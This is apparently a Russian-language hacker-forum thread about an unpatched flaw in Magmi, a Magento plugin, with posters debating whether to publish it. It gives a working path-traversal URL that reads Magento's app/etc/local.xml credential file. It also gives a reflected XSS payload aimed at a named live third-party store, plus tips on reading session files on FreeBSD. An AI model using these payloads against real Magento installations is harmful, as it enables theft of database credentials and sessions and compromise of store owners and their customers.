![]() |
Локальня читалка Magento:
http://localhost/magmi/web/download_file.php?file=../../app/etc/local.xml Пример уязвимых урлов: Цитата:
PHP код:
P.S: Обнаружил случайно в пакете с обновлением фикса баги _http://www.exploit-db.com/exploits/35052/ сам фикс с багой, читалкой на гитхабе https://github.com/dweeves/magmi-git Magento CE 1.8.x & 1.9.x |
Хм, Magento на FreeBSD, возможно, можно сразу скомпроментировать, так как при чтении директории(это тоже файл!) можно получить список файлов. Сессия по умолчанию пишется в файловую си-му в install-dir/var/session обычно, в БД редко(в Wizard установщике по дефолту файловая си-ма )
|
Может пора спустить в паблик?
|
Не стоит
|
В целом, стоит - не стоит, решать автору
|
спускай, а на гитхабе сделаем ссылку на пост)) пускай фиксят, бага все равно мало полезная...
P.S:Пасивная XSS http://www.lowellcraft.com/magmi/web/ajax_gettime.php POSTrefix=alert('xss') magmi/web/ajax_gettime.php PHP код:
|
ППЦ(((( https://www.trustwave.com/Resources...mmerce-platform-Magento-targeted-in-the-wild/ - себе багу присвоили, разместили статью от 13.10.2015
|
Оперативно они...
хм, похожая бага тоже от февраля https://packetstormsecurity.com/file...gmi-lfixss.txt |
Цитата:
|
| Время: 02:56 |